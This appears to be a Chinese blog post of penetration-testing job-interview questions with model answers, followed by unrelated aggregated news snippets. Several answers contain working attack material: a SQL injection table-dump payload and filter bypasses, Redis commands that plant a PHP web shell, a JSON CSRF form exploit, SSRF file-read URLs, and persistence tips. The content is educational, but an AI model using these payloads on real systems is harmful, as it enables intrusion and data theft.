2025年渗透测试面试题总结-匿名[校招]渗透测试工程师(题目+回答)

article/2025/8/16 16:27:36

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

匿名[校招]渗透测试工程师 

1. 自我介绍

2. 印象深刻的一次渗透

3. 渗透测试流程

4. SQL注入原理及Payload(爆表名)

5. SQL注入空格绕过方法

6. SQL注入防御及预处理局限

7. 同源策略(Same-Origin Policy)

8. a.baidu.com 与b.baidu.com 是否同源?

9. SSRF原理及利用

10. Redis攻击Payload(手写)

11. CSRF原理及防御

12. 仅解析JSON时的CSRF利用

13. SameSite属性

14. DNS Rebinding攻击

15. Fastjson反序列化及修复

16. 子域名枚举工具及原理

17. Java学习程度

匿名[校招]渗透测试工程师 

1. 自我介绍 
2. 印象深刻的一次渗透 
3. 渗透测试的流程
4. SQL注入原理,及常用payload(手写-爆表名) 
5. SQL注入空格不能使用如何绕过 
6. SQL注入防御,延申预处理不能预防哪些注入 
7. 同源策略 
8. a.baidu.com和b.baidu.com是否同源 
9. SSRF原理,利用 
10. 攻击redis的方式(手写payload) 
11. CSRF的原理及防御 
12. 一种特殊的CSRF场景:后端只解析json格式的时候如何利用CSRF(非更改Content-Type)
13. SameSite 
14. DNS Rebinding 
15. Fastjson反序列化及如何修复 
16. 子域名枚举用过那些工具,原理是什么,如果出现了任意子域名都返回200是什么原因? 
17. Java学到哪种程度了?

1. 自我介绍

我是专注网络安全领域的技术研究者,研究方向涵盖渗透测试、漏洞攻防、红队技术链及企业安全体系建设。具备APT对抗、内网渗透、武器化工具开发等实战经验,熟悉Java/Python开发及主流安全工具链(如Cobalt Strike、Metasploit)。近期参与多个省级护网行动,主导金融系统红队演练并完成0day漏洞武器化利用。


2. 印象深刻的一次渗透

案例背景:针对某大型企业OA系统的渗透测试,目标系统表面防护严密(WAF+双因子认证)。
突破过程

  1. 信息泄露:通过Git历史回滚发现测试环境源码,解析硬编码的Redis密码。
  2. 横向移动:利用Redis未授权访问写入SSH公钥,获取跳板机权限。
  3. 权限提升:在跳板机发现运维人员的Jenkins凭据(明文存储),通过Jenkins管道执行命令拿下Docker宿主机。
  4. 域渗透:从宿主机内存提取域账号Hash,利用Kerberoasting攻击获取域管权限。
    技术亮点
  • 绕过双因子认证:通过Cookie复用劫持已登录会话。
  • 隐蔽通信:使用DNS隧道传递敏感数据,规避流量检测。

3. 渗透测试流程

  1. 信息收集
    • OSINT:域名/IP资产测绘(Fofa/Shodan)、员工信息(领英/脉脉)。
    • 技术栈识别:Wappalyzer扫描、HTTP头分析。
  2. 漏洞探测
    • 自动化扫描:Nessus/AWVS定位高风险点(如SQL注入、SSRF)。
    • 手工验证:逻辑漏洞(越权、验证码绕过)、非常规路径测试。
  3. 利用与提权
    • 初始入口:通过漏洞获取WebShell或系统权限。
    • 横向移动:密码喷射、Pass-the-Hash、服务漏洞利用(如SMB/Redis)。
  4. 权限维持
    • 后门植入:计划任务、启动项、隐藏账户。
    • 数据窃取:数据库脱库、配置文件抓取。
  5. 报告输出
    • 风险评级:CVSS评分、影响范围量化。
    • 修复建议:代码层修复方案(如参数化查询)、配置加固指南。

4. SQL注入原理及Payload(爆表名)

原理:用户输入未过滤直接拼接到SQL语句,导致攻击者可执行恶意SQL代码。
爆表名Payload

sql' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()-- 

关键点

  • information_schema.tables :MySQL元数据表,存储表信息。
  • group_concat():合并多行结果,避免逐行回显。
  • database():获取当前数据库名。

5. SQL注入空格绕过方法

  1. 注释替代/**/(如SELECT/**/1)。
  2. 特殊符号
    • %09(Tab)、%0a(换行)、%0c(换页)。
    • ()包裹参数:UNION(SELECT 1,2)
  3. 编码绕过:URL编码(%20)、Unicode编码(%u0020)。
  4. 数据库特性
    • MySQL:+号连接(SELECT+1)。
    • Oracle:||拼接符替代空格。

6. SQL注入防御及预处理局限

防御方案

  • 参数化查询(PreparedStatement):分离SQL逻辑与数据。
  • 输入过滤:正则白名单(如仅允许字母数字)。
  • 最小权限:数据库账户禁用FILEEXECUTE权限。
    预处理局限
  1. 动态表名/列名:若表名由用户输入拼接,预处理无法生效。
  2. 复杂查询ORDER BY后接参数时,预处理可能失效。
  3. 存储过程:若存储过程内部拼接SQL,仍存在注入风险。

7. 同源策略(Same-Origin Policy)

定义:浏览器限制脚本只能访问与当前页面同源的资源。同源条件:协议、域名、端口完全一致
限制范围

  • Cookie/LocalStorage访问。
  • AJAX请求响应读取。
  • DOM操作(如iframe跨域通信)。

8. a.baidu.com 与b.baidu.com 是否同源?

。同源策略要求主机名(host)完全一致,子域名不同视为不同源。但可通过以下方式跨域:

  • document.domain = "baidu.com" (需双方显式设置)。
  • CORS头(如Access-Control-Allow-Origin: *.baidu.com )。

9. SSRF原理及利用

原理:服务端未校验用户提供的URL,攻击者可访问内网资源或本地服务。
利用场景

  1. 内网探测:扫描192.168.0.0/24的存活主机。
  2. 协议利用
    • file:///etc/passwd读取本地文件。
    • dict://<ip>:6379/info探测Redis服务。
  3. 攻击中间件:利用HTTP头注入攻击FastCGI、PHP-FPM。

10. Redis攻击Payload(手写)

目标:通过未授权访问写入WebShell。

bashredis-cli -h 目标IP config set dir /var/www/html # 设置Web目录 config set dbfilename shell.php set x "<?php system($_GET['cmd']);?>" save 

验证:访问http://目标IP/shell.php?cmd=id ,执行系统命令。


11. CSRF原理及防御

原理:诱导用户浏览器携带身份凭证(如Cookie)发起恶意请求。
防御方案

  1. Token验证:请求中携带随机Token,服务端校验。
  2. SameSite Cookie:设置SameSite=Lax/Strict限制跨域携带。
  3. 验证Referer:检查请求来源域名是否合法。

12. 仅解析JSON时的CSRF利用

绕过方法

  1. Form表单+JS提交
    html<form action="http://target/api" method="POST" enctype="text/plain"> <input name='{"a":"1", "b":"' value='2"}' type="hidden"> </form> <script>document.forms[0].submit()</script> 
    原理:构造enctype="text/plain",拼接JSON格式数据。
  2. Flash跨域:利用Flash的跨域请求能力发送JSON(需旧版浏览器)。

13. SameSite属性

作用:控制Cookie是否随跨站请求发送,三种模式:

  • Strict:仅同站请求发送。
  • Lax:允许导航跳转(如链接点击)携带Cookie。
  • None:允许跨站携带,但需同时设置Secure(HTTPS)。

14. DNS Rebinding攻击

原理:利用DNS TTL过期重新绑定域名到内网IP,绕过同源策略。
攻击步骤

  1. 用户访问evil.com ,解析到外网IP。
  2. TTL过期后,evil.com 重新解析到192.168.1.1(内网)。
  3. 浏览器继续与“同域名”的内网IP通信,绕过限制。

15. Fastjson反序列化及修复

漏洞根源autotype功能允许加载任意类,导致RCE。
利用方式:构造恶意JSON触发JNDI注入(如@type指定com.sun.rowset.JdbcRowSetImpl )。
修复方案

  1. 升级至1.2.68+版本,开启safeMode
  2. 关闭autotype功能:ParserConfig.getGlobalInstance().setSafeMode(true);
  3. 使用白名单机制限制反序列化类。

16. 子域名枚举工具及原理

工具与原理

  1. subfinder:聚合证书透明日志(CT Log)、DNS数据源(如Virustotal)。
  2. Sublist3r:基于搜索引擎(Google/Baidu)的语法搜索(如site:*.baidu.com )。
  3. 爆破工具:dnsgen+massdns,利用字典暴力枚举。
    泛解析问题:若所有子域名返回200,需对比响应内容差异(如标题、正文长度)。

17. Java学习程度

技术栈

  • 语言基础:熟悉多线程、反射、JNI、ASM字节码操作。
  • 安全方向:
    • 漏洞分析:反序列化、内存马(Tomcat Filter型)、JNDI注入。
    • 安全编码:防御SQL注入、XSS的代码规范。
  • 框架研究:Spring Security机制、Shiro权限绕过高危场景分析。
    项目经验:开发Java Agent型HIDS、基于ASM的RASP原型系统。

http://www.hkcw.cn/article/pRlHlhhoRs.shtml

相关文章

“公安英模”邱建军雕像揭幕 缅怀英烈激励警心

6月1日是邱建军牺牲一周年,当天,他的雕像回到了汉兴派出所,仿佛又将大家带回到他保护群众安全而壮烈牺牲的那一瞬间,诉说着往昔的故事。为缅怀英烈、弘扬楷模精神,激励担当作为、凝聚奋进力量,江汉区公安分局邀请武汉泥塑艺术家胡作林制作了邱建军的雕像,并将其存放在汉…

硬核龙舟祝福端午 粽香飘飘竞渡忙

今天,端午节粽香飘飘、龙舟竞渡在守护家国安宁的“赛道”上战士们时刻奋楫争先硬核端午壁纸上新,请查收↓责任编辑:zhangxiaohua

专家谈以色列在约旦河西岸行事激进 侵蚀“两国方案”基础

当地时间5月30日,以色列国防部长卡茨宣布将在约旦河西岸地区建立“犹太人以色列国家”。此前,以色列安全内阁已决定在该地区新建22处犹太人定居点。中国国际问题研究院助理研究员李子昕指出,当前以色列的激进做法源于国内形势。以色列在加沙地带和约旦河西岸继续开展军事行动…

回顾香港演员方刚经典作品 致敬“第一恶人”

香港影坛“第一恶人”方刚于5月30日去世,享年78岁。方刚原名梁芳纲,曾是无线电视及亚视电视演员,出演过多部经典作品如《人在边缘》《豪门》《胜者为王lll王者之战》等。方刚1947年11月出生,学生时代就热爱舞台表演,12岁时开始客串影视作品。22岁时参演武侠电影《黑豹》和…

圆明园端午“十二花神”亮相 沉浸式体验传统文化魅力

端午节期间,圆明园变身为“东方美学乐园”。5月31日,“爱在海淀 曲动端阳”2025圆明园端午文化活动拉开帷幕,市民可以一站式体验传统民俗、非遗手作、汉服乐舞和创意市集,感受中华文化的魅力。《胤禛美人图》中的古典美人仿佛从画卷中走出,化身“十二花神”来到圆明园。她…

大朋友也能过六一 找回童趣与热爱

在阳光下,我们像孩子一样纯真;在风雨中,我们则要坚强如大人。长大后,我们常常怀念过去的时光,想念儿时那份无忧无虑的快乐。今天,无论年龄多大,都可以过一个充满童真的六一儿童节。让我们暂时抛开生活的重担和伪装,找回那份久违的童趣和对生活的热爱。勇敢地做自己,无…

男子长期喝生水致肾脏长出巨大结石 罕见348克“生姜”石

唐先生长期喝生水,导致肾脏长出巨大结石。湖南省人民医院岳麓山院区泌尿外科从患者右肾中取出一个潜伏20年、重达348克、形状酷似姜块的铸型结石。术后,唐先生恢复顺利,目前已经出院。59岁的唐先生来自湖南永州,20年前因血尿被诊断为右肾结石,做了体外碎石手术后症状缓解,…

SKQL空气流向管理系统

SKQL空气流向管理系统 一、系统介绍 厂家&#xff1a;一九九二九九零七八八三 空气流向管理系统是针对医疗建筑公共安全研制的压差/风量机电一体化系统&#xff0c;具有平疫结合等多种运行工况&#xff0c;实时监视并控制各区域压力梯度和送排风系统风量&#xff0c;通过对压…

专家:特朗普还能卡住C919脖子吗 航空禁售再上演

5月28日,《纽约时报》报道,特朗普政府暂停了允许美国公司向中国商飞出售产品和技术的许可证,限制了包括航空发动机在内的一系列产品与技术的出口。这意味着由美国通用电气与法国赛峰合资成立的CFM国际可能无法继续向中国出口LEAP-1C发动机,这是中国大飞机C919当前使用的发动…

未来三天可能发生地磁暴 极光或将现身北方

未来三天内,可能出现地磁暴。6月1日,中国气象局国家空间天气监测预警中心发布消息,北京时间5月31日7时45分左右,太阳活动区14100开始爆发耀斑,软X射线流量快速上升,并在8时05分达到M8.1级中等耀斑强度的峰值。预计未来三天可能发生地磁暴,6月2日左右,我国北部有机会看到…

大连网友称疑患精神病邻居持刀上门 社区与警方积极介入处理

近日,有大连网友在社交平台上发布视频称,5月1日和5月28日,疑似患有精神疾病的邻居两次持刀上门,用刀砍其家门并进行踢踹。该网友表示,他们才搬过来一年,与这名邻居素不相识,没有正面交流过。一名当地官方知情人士透露,这名人员精神方面疑似存在问题,目前属地公安和社区…

我国北部或出现极光 太阳活动引发期待

北京时间5月31日07时45分左右,太阳活动区14100开始爆发耀斑,软X射线流量快速上升,并在08时05分达到M8.1级中等耀斑强度。根据中国气象局国家空间天气监测预警中心的预判,未来三天可能发生地磁暴。预计2日左右,我国北部地区有机会出现较为明显的极光,部分地区甚至可能出现…

上海外滩再现武警隔离人墙 守护节日平安

端午假期,上海外滩迎来大量市民游客。为确保节日期间社会治安稳定和市民出行安全,武警上海总队机动第一支队的官兵全力守护城市平安,让人民群众能够过上一个安乐祥和的节日。外滩作为上海标志性景点,客流密集,安全保障压力较大。武警官兵提前研判形势,制定了科学勤务方案…

中国北部有机会出现较为明显的极光 太阳活动引发地磁暴

北京时间5月31日07时45分左右,太阳活动区14100开始爆发耀斑,软X射线流量快速上升,并在08时05分达到峰值M8.1级中等耀斑强度。根据中国气象局国家空间天气监测预警中心的预判,未来三天可能发生地磁暴。2日左右,我国北部有机会出现较为明显的极光,部分地区甚至可能看到红绿…

【博客节选】自定义 timeline track 与 PlayableBehaviour数据交互

注&#xff1a;软件版本Unity 6.0 Timeline 1.8.7 作者&#xff1a;CSDN RingleaderWang 原文&#xff1a;《Unity第25期——Timeline结构及其源码浅析》 文章首发Github&#x1f44d;&#xff1a;《Timeline结构及其源码浅析》 Bilibili 视频版&#x1f44d;&#x1f44d;&a…

陈雨菲夺新加坡公开赛冠军 完胜队友登顶

在2025年新加坡羽毛球公开赛女单决赛中,中国选手陈雨菲以2比0战胜队友王祉怡,夺得冠军。比赛结束后,陈雨菲庆祝胜利并在颁奖仪式上领取了奖杯。比赛中,两位选手都展现了出色的技术和拼搏精神,为观众带来了一场精彩的对决。责任编辑:zhangxiaohua

俄两座桥梁遭爆炸袭击被定性为恐袭 普京连夜接收报告

当地时间6月1日,俄罗斯侦查委员会将布良斯克州和库尔斯克州的桥梁遭破坏事件定性为恐怖袭击。俄罗斯总统新闻秘书佩斯科夫表示,普京整夜都在通过联邦安全局和紧急情况部渠道接收关于这两起事件的报告。在24小时内,两座桥梁因爆炸遭到破坏。5月31日22时50分,布良斯克州维戈尼…

明后天强降雨区域南压至华南等地 端午出行需警惕

端午假期第二天,中东部地区持续出现较大范围的降雨,长江中下游仍是主要降雨区域。安徽南部、浙江西北部、湖南西南部、贵州东南部、广西北部、云南西北部和西藏东南部等地部分地区遭遇大暴雨。预计明天降雨区域将向南移动,华南地区的雨势会增强,福建东北部、广东中部、云南…

俄方将桥梁坍塌事件定性为恐怖袭击 普京连夜关注进展

当地时间6月1日,俄罗斯侦查委员会将布良斯克州和库尔斯克州的桥梁遭破坏事件定性为恐怖袭击。俄罗斯总统新闻秘书佩斯科夫表示,普京整夜都在通过联邦安全局和紧急情况部渠道接收有关这两起事件的报告。在24小时内,两座桥梁因爆炸遭到破坏。据俄罗斯联邦侦查委员会消息,5月3…

YOLOv10速度提升与参数缩减解析2025.5.31

YOLOv10作为YOLO系列的最新版本&#xff0c;在模型参数压缩和效率优化方面做出了显著改进&#xff0c;但其速度提升与参数缩减之间看似不成比例的现象&#xff0c;主要源于其设计策略和硬件适配的综合影响。以下从多个角度分析这一问题的技术背景和原因&#xff1a; 1. 参数缩减…